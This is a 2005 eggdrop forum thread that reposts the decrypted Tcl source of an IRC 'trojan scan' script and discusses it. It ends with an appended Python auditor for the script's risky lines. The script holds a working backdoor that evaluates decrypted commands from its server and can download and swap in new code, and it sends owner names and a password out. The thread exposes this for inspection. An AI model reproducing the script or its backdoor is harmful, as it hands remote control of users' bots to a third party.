egghelp.org community
Discussion of eggdrop bots, shell accounts and tcl scripts.

encrypted trojan scan script (cont.)
^DooM^
Owner


Joined: 26 Aug 2003
Posts: 772
Location: IronForge

Posted: Thu May 19, 2005 5:47 am    Post subject: encrypted trojan scan script (cont.)

Due to the previous thread being screwed up by the long encrypted text line I have reposted Sir_Fz's unencrypted script post here.

Sir_fz wrote:
Code:

      # -- flags

        setudef flag aspbgbl
        setudef flag aspbwarn

      # -- strings

        setudef str aspbkickmsg

        setudef str detected
        setudef str joins
        setudef str kicked

      # -- bindings

        # - remove me

          bind MSG -|- "REMOVEME" aspbgbl:remove:user

        # - check for possible trojans onjoin

          bind JOIN -|- "*" aspbgbl:check:user

        # - update channels

          bind PART -|- "*" aspbgbl:update:channels

        # - update botname

          bind NICK -|- "*" aspbgbl:update:nickname

        # - script status

          bind PUB nm|nm "$::aspb(trigger)" aspbgbl:status

        # - auto update

          bind TIME -|- "00 * * * *" aspbgbl:update

    # --- script main source - NEVER TOUCH IT ;)

      # -- auto update aspbgbl

        proc aspbgbl:update { minute hour day month year } {

          if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          }

          putdcc $idx "cmd=011 $::aspb(version)"

        }

      # -- trojan scan control panel

        proc aspbgbl:status { nickname hostname handle channel arguments } {

          global lastbind

          if {[channel get $channel "aspbkickmsg"] == ""} {
            channel set $channel aspbkickmsg $::aspb(default)
          }

          switch -exact -- [string tolower [lindex [split $arguments] 0]] {

            "warn" {

              set status "Bot will warn users."

              if {![channel get $channel "aspbwarn"]} {
                set status "Bot won't warn users."
              }

              switch -exact -- [string tolower [lindex [split $arguments] 1]] {

                "on" {
                  putserv "NOTICE $nickname :Successfully turned on"; channel set $channel +aspbwarn
                }

                "off" {
                  putserv "NOTICE $nickname :Successfully turned off"; channel set $channel -aspbwarn
                }

                "default" {
                  putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037 \037on\037|\037off\037"
                }

              }           

            }

            "stats" {

              if {![regexp {[0-9]{1,}} [channel get $channel "joins"]] || ![regexp {[0-9]{1,}} [channel get $channel "detected"]] || ![regexp {[0-9]{1,}} [channel get $channel "kicked"]] || ![channel get $channel "aspbgbl"]} {
                putserv "NOTICE $nickname :No statistic available :("; return
              }

              putserv "NOTICE $nickname :\037Joins:\037 [channel get $channel "joins"] \037Detected Clients:\037 [channel get $channel "detected"] \037Kicked Clients:\037 [channel get $channel "kicked"]"

            }

            "status" {

              set status "aspb is enabled."

              if {![channel get $channel "aspbgbl"]} {
                set status "aspb is disabled."
              }

              switch -exact -- [string tolower [lindex [split $arguments] 1]] {

                "on" {
                  putserv "NOTICE $nickname :Successfully turned on."; putserv "PRIVMSG $channel :\001ACTION aspb ver. $::aspb(version) by $::aspb(author)\001"; channel set $channel +aspbgbl
                }

                "off" {
                  putserv "NOTICE $nickname :Successfully turned off."; channel set $channel -aspbgbl
                }

                "default" {
                  putserv "NOTICE $nickname :$status Please use: $lastbind \037status\037 \037on\037|\037off\037"; return
                }

              }

              if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
                return
              }

              set enabled ""
 
              foreach chan [channels] {

                if {![channel get $chan "aspbgbl"]} {
                  lappend enabled $chan
                } else {
                  lappend enabled +$chan
                }
         
              }

              putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"

            }

            "kickmsg" {

              if {[join [lrange [split $arguments] 1 end]] == ""} {


                if {[channel get $channel "aspbkickmsg"] == ""} {
                  set kickmessage "not set"
                } else {
                  set kickmessage [channel get $channel "aspbkickmsg"]
                }

                putserv "NOTICE $nickname :Kickmessage: [join $kickmessage]"
                putserv "NOTICE $nickname :Please use: $lastbind \037kickmsg\037 \037message\037 (Available options: %1\$s = hostname, %2\$s = botnick, %3\$s = trojan id, %4\$s = detected counter, %5\$s = trojan type)"

                return

              }

              channel set $channel aspbkickmsg [join [lrange [split $arguments] 1 end]]

              putserv "NOTICE $nickname :Kickmessage successfully saved."

            }

            "default" {

              set status "aspb is enabled."

              if {![channel get $channel "aspbgbl"]} {
                set status "aspb is disabled."
              }

              putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037|\037status\037|\037stats\037|\037kickmsg\037 \037?arguments?\037"

            }

          }

        }

      # -- get command/result from the database

        proc aspbgbl:database { idx arguments } {

          if {![valididx $idx]} {
            return
          }

          foreach argument $arguments {

            if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
              set $variable $value
            }

          }

          if {![info exists cmd]} {
            return
          }

          if {$cmd == "004"} {

            if {![info exists type]} {
              set type ""
            }

            channel set $chan detected [expr [channel get $chan "detected"] + 1]
            channel set $chan kicked [expr [channel get $chan "kicked"] + 1]

            if {![info exists reason] || [llength $reason] < 1} {
              set reason [format [join [channel get $chan "aspbkickmsg"]] [lindex [split $mask "@"] 1] $::botnick $id [channel get $chan "detected"] $type]; set warn 1
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason; set warn 0
            }

            set unban ""

            foreach chanban [chanbans $chan] {

              if {[lindex $chanban 2] >= 300} {
                lappend unban [lindex $chanban 0]
              }

              if {[llength $unban] == "6"} {
                putquick "MODE $chan -[string repeat "b" [llength $unban]] [join $unban]"; set unban ""
              }

            }

            if {$unban == "" && [llength [chanbans $chan]] == "45"} {

              set banid 0

              while {$banid < 5} {
                lappend unban [lindex [lindex [chanbans $chan] $banid] 0]; incr banid 1
              }

            }

            putquick "KICK $chan $nick :$reason" -next
            putquick "MODE $chan -[string repeat "b" [llength $unban]]+b [join $unban] $mask"

            if {[channel get $chan "aspbwarn"] && $warn} {
              putserv "NOTICE $nick :You are known as possible ${type}-trojan infected drone. If you wish to remove yourself, please type in: /msg $::botnick removeme"
              putserv "NOTICE $nick :More Information can be found at: \037[format www.pjen.net/?id=%d&botnick=%s $id $::botnick]\037"
            }

          } elseif {$cmd == "099"} {
            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
          } elseif {$cmd == "013"} {

            if {![validchan $chan]} {
              return
            }

            channel set $chan -aspbgbl

            if {![info exists reason]} {
              set reason "not given"
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
            }

            putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"

          } elseif {$cmd == "010"} {

            if {![info exists reason]} {
              set reason "not given"
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
            }

            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                continue
              }

              channel set $chan -aspbgbl

              putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"

            }

          } elseif {$cmd == "012"} {

            if {[catch { exec wget $url } result]} {

              if {![info exists changes]} {
                set changes "not given"
              } else {
                regexp -nocase -- {^.+ message=(.+?)$} $arguments -> changes
              }

              if {[regexp -- {^.+\`(.+?)\'.+$} $result -> filename]} {

                if {[file exists $::aspb(path)]} {
                  file delete -force $::aspb(path)
                }

                file rename -force $filename $::aspb(path)

                if {[file exists $filename]} {
                  file delete -force $filename
                }

                set owners ""

                foreach owner [userlist n] {

                  if {[hand2nick $owner] != ""} {
                    lappend owners [hand2nick $owner]
                  }

                }

                if {[llength $owners] > 0} {
                  putserv "PRIVMSG [join $owners ","] :Your aspbgbl version has been updated. (Changes: $changes)"
                }

                if {[array exists ::aspb]} {
                  array unset ::aspb
                }

                catch { killdcc $idx }

                rehash

              }

              return

            }

            putlog "aspbgbl\002:\002 There is a new aspbgbl version available."

          } elseif {$cmd == "009"} {

            if {!$status} {
              puthelp "NOTICE $nick :Your hostname '$mask' isn't known in the database.";return
            }

            puthelp "NOTICE $nick :Your hostname '$mask' has been successfully removed."

            set unbanned ""

            foreach channel [channels] {

              if {[channel get $channel "aspbgbl"]} {

                foreach channelban [chanbans $channel] {

                  if {[string match -nocase [lindex [split $channelban] 0] $mask]} {
                    lappend unbanned $channel; pushmode $channel -b [lindex [split $channelban] 0]
                  }

                }

              }

            }

            if {[llength $unbanned] > 0} {
              puthelp "NOTICE $nick :Feel free to rejoin the following [expr {([llength $unbanned] == 1) ? "channel" : "channels" }] [join $unbanned ", "]"
            }

          } elseif {$cmd == "014"} {

            regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message

            if {![info exists message]} {
              return
            }

            set list ""

            foreach owner [userlist n] {

              if {[set nick [hand2nick $owner]] != ""} {
                lappend list $nick
              }

            }

            putserv "PRIVMSG [join $list ","] :$message"

          } elseif {$cmd == "015"} {

            regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message

            if {![info exists message]} {
              return
            }

            set list ""

            foreach channel [channels] {

              if {[channel get $channel "aspbgbl"]} {
                lappend list $channel
              }

            }

            putserv "PRIVMSG [join $list ","] :\001ACTION attention, aspb broadcast: $message\001"

          }

        }

      # -- remove a possible user

        proc aspbgbl:remove:user { nickname hostname handle arguments } {

          if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          }

          putdcc $idx "cmd=008 $nickname!$hostname"

        }

      # -- update database information

        proc aspbgbl:update:channels { nickname hostname handle channel reason } {

          if {[isbotnick $nickname]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {[string equal -nocase $chan $channel]} {
                continue
              }

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"

          }

        }

      # -- update botname information

        proc aspbgbl:update:nickname { nickname hostname handle channel newnick } {

          global nospam

          if {[isbotnick $nickname] && ![string equal -nocase $nickname $newnick]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            } elseif {[info exists nospam] && [expr [unixtime] - $nospam] < 5} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
            set nospam [unixtime]

          }

        }

      # -- check for possible trojan on join

        proc aspbgbl:check:user { nickname hostname handle channel } {

          if {[isbotnick $nickname]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
            return

          }

          channel set $channel joins [expr [channel get $channel "joins"] + 1]

          if {[string match "*quakenet.org" $hostname]} {
            return
          } elseif {[matchattr $handle mno|mno $channel]} {
            return
          } elseif {![botisop $channel]} {
            return
          } elseif {[regexp -- {i|k|r} [lindex [getchanmode $channel] 0]]} {
            return
          } elseif {![channel get $channel "aspbgbl"]} {
            return
          } elseif {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          } elseif {[isbotnick $nickname]} {
            return
          }

          if {[channel get $channel "aspbkickmsg"] == ""} {
            channel set $channel aspbkickmsg $::aspb(default)
          }

          set idler    0
          set operator 0
          set voice    0

          foreach user [chanlist $channel] {

            if {[isop $user $channel]} {
              incr operator 1
            } elseif {[isvoice $user $channel]} {
              incr voice 1
            }

            incr idler 1

          }

          putdcc $idx "cmd=003 $nickname!$hostname $channel $idler $operator $voice"

        }

      # -- get idx for the aspbgbl database

        proc aspbgbl:connection { address } {

          foreach socket [dcclist] {

            if {[string equal -nocase $address [lindex [split $socket] 2]]} {
              return [lindex [split $socket] 0]
            }

          }

          if {![valididx [set idx [connect $::aspb(address) $::aspb(port)]]]} {
            return -1
          }

          set enabled ""

          foreach channel [channels] {

            if {![channel get $channel "aspbgbl"]} {
              lappend enabled $channel
            } else {
              lappend enabled +$channel
            }
         
          }

          putdcc $idx "cmd=001 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
          control $idx aspbgbl:database

          return $idx

        }

_________________
The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born

Sir_Fz
Revered One

Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon

Posted: Thu May 19, 2005 5:52 am

Good idea, my post is really ugly Laughing
_________________
Follow me on GitHub

- Opposing

Public Tcl scripts

Alchera
Revered One

Joined: 11 Aug 2003
Posts: 3344
Location: Ballarat Victoria, Australia

Posted: Thu May 19, 2005 7:39 am

So I didn't need new glasses after all? Yay! Laughing
_________________
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM

^DooM^
Owner

Joined: 26 Aug 2003
Posts: 772
Location: IronForge

Posted: Thu May 19, 2005 8:39 am

Haha it took me a while to find the post, it just looked like there was nothing till I scrolled over and down. Just doing my good deed for the day Wink

Thunderdome
Op

Joined: 15 Mar 2005
Posts: 187

Posted: Thu May 19, 2005 9:01 am

How does this script work? I tried to read the code, but I don't understand what it does...

ex
Voice

Joined: 18 May 2005
Posts: 14
Location: Chicago

Posted: Thu May 19, 2005 10:41 am

it connects to a bot and on every join it asks whether it is a spamclient or not.

+ some additional features.

metroid
Owner

Joined: 16 Jun 2004
Posts: 771

Posted: Thu May 19, 2005 6:29 pm

Guys, I just happen to know who made this script and code gets obfuscated for a reason. You shouldn't deobfuscate code for someone without the explicit authorisation from the author, unless there would be malicious code in it, which I don't think there is..

greenbear
Owner

Joined: 24 Sep 2001
Posts: 733
Location: Norway

Posted: Thu May 19, 2005 8:38 pm

That's just bullshit. It's distributed freely under the GNU licence. If he didn't want people to read it, he shouldn't have made it public.

Sir_Fz
Revered One

Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon

Posted: Fri May 20, 2005 3:43 am

Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably no one has tried to look through it)

Besides, it's decrypting, the code is still the same.

^DooM^
Owner

Joined: 26 Aug 2003
Posts: 772
Location: IronForge

Posted: Fri May 20, 2005 5:57 am

Sir_Fz wrote:
Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably no one has tried to look through it)

Besides, it's decrypting, the code is still the same.


Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not have released it to the public.

Alchera
Revered One

Joined: 11 Aug 2003
Posts: 3344
Location: Ballarat Victoria, Australia

Posted: Fri May 20, 2005 6:49 pm

I thought only Vulcans used logic? Very Happy Laughing

Bravo one and all.

Sir_Fz
Revered One

Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon

Posted: Fri May 20, 2005 7:26 pm

I forgot to mention, that code was encrypted like 4 times Razz lol. Every time I decrypted it, it showed me yet another encryption (was about to give up on it Razz ). Maybe next time he should try encrypting it endlessly Laughing

Galadhrim
Op

Joined: 11 Apr 2003
Posts: 123
Location: Netherlands, Enschede

Posted: Sat May 21, 2005 4:41 am

maybe make a better decrypter that uses recursiveness.

De Kus
Revered One

Joined: 15 Dec 2002
Posts: 1361
Location: Germany

Posted: Sat May 21, 2005 9:42 am

^DooM^ wrote:
Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not have released it to the public.

Since he distributed it under the GNU GPL it would even be illegal to make the source code inaccessible.
_________________
De Kus
StarZ|De_Kus, De_Kus or DeKus on IRC
Copyright 2005-2009 by De Kus - published under The MIT License
Love hurts, love strengthens...

Arie
Voice

Joined: 18 Jul 2005
Posts: 1

Posted: Mon Jul 18, 2005 10:29 am

the part:

Code:
 } elseif {$cmd == "099"} {
            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }


was a backdoor I heard - don't know tcl =p
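
Added example, not part of any post in this thread: a small static audit for the reposted script and the `cmd == "099"` branch quoted in the last post, flagging lines inside a socket handler (a proc registered with `control $idx ...`) where data from the remote side reaches `eval`, `exec`, a dynamic `set`, or a forced file replace followed by `rehash`. The rule names and the `SAMPLE` excerpt (assembled from lines of the reposted script) are this example's own, and the brace counting used to track proc scope is a heuristic, not a Tcl parser.

```python
import re

# Sink patterns for an eggdrop Tcl script; rule names are this example's own.
RULES = [
    ("remote-eval", re.compile(r"\beval\s+\[.*\bdecrypt\b"),
     "evaluates text decrypted from a message as Tcl code"),
    ("external-exec", re.compile(r"\bexec\s+\S+.*\$\w+"),
     "runs an external program with an argument taken from a variable"),
    ("dynamic-set", re.compile(r"\bset\s+\$\w+\s+\$\w+"),
     "variable name comes from input, so a message can set any local"),
    ("file-overwrite", re.compile(r"\bfile\s+(?:rename|delete)\s+-force\b"),
     "force-replaces or deletes a file on disk"),
    ("reload", re.compile(r"^\s*rehash\b"),
     "reloads the bot's configuration and scripts"),
]
CONTROL = re.compile(r"\bcontrol\s+\$\w+\s+(\S+)")
PROC = re.compile(r"^\s*proc\s+(\S+)\s")

# Constructed excerpt: lines taken from the script reposted in this thread.
SAMPLE = r'''
proc aspbgbl:database { idx arguments } {
  foreach argument $arguments {
    if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
      set $variable $value
    }
  }
  if {$cmd == "099"} {
    regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
  } elseif {$cmd == "012"} {
    if {[catch { exec wget $url } result]} {
      file rename -force $filename $::aspb(path)
      rehash
    }
  }
}
proc aspbgbl:connection { address } {
  set idx [connect $::aspb(address) $::aspb(port)]
  control $idx aspbgbl:database
  return $idx
}
'''

def remote_handlers(lines):
    """Procs given a socket via `control $idx <proc>` receive remote input."""
    return {m.group(1) for ln in lines if (m := CONTROL.search(ln))}

def audit(source):
    """Return one finding per rule hit, marked remote if inside a handler."""
    lines = source.strip().splitlines()
    handlers = remote_handlers(lines)
    findings, proc, depth = [], None, 0
    for no, ln in enumerate(lines, 1):
        if ln.lstrip().startswith("#"):      # skip whole-line comments
            continue
        m = PROC.match(ln)
        if m and depth == 0:                 # entering a top-level proc
            proc = m.group(1)
        for name, pat, why in RULES:
            if pat.search(ln):
                findings.append({"line": no, "proc": proc, "rule": name,
                                 "remote": proc in handlers, "why": why})
        depth += ln.count("{") - ln.count("}")
        if depth <= 0:                       # proc body closed
            proc, depth = None, 0
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE):
        tag = "REMOTE" if f["remote"] else "local"
        print(f'{f["line"]:>3} {tag:<6} {f["rule"]:<14} {f["proc"]}: {f["why"]}')
```

Findings marked REMOTE are the ones to read first when deciding whether to load a script: they sit in the proc that processes whatever the connected server sends.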

All times are GMT - 4 Hours
Page 1 of 2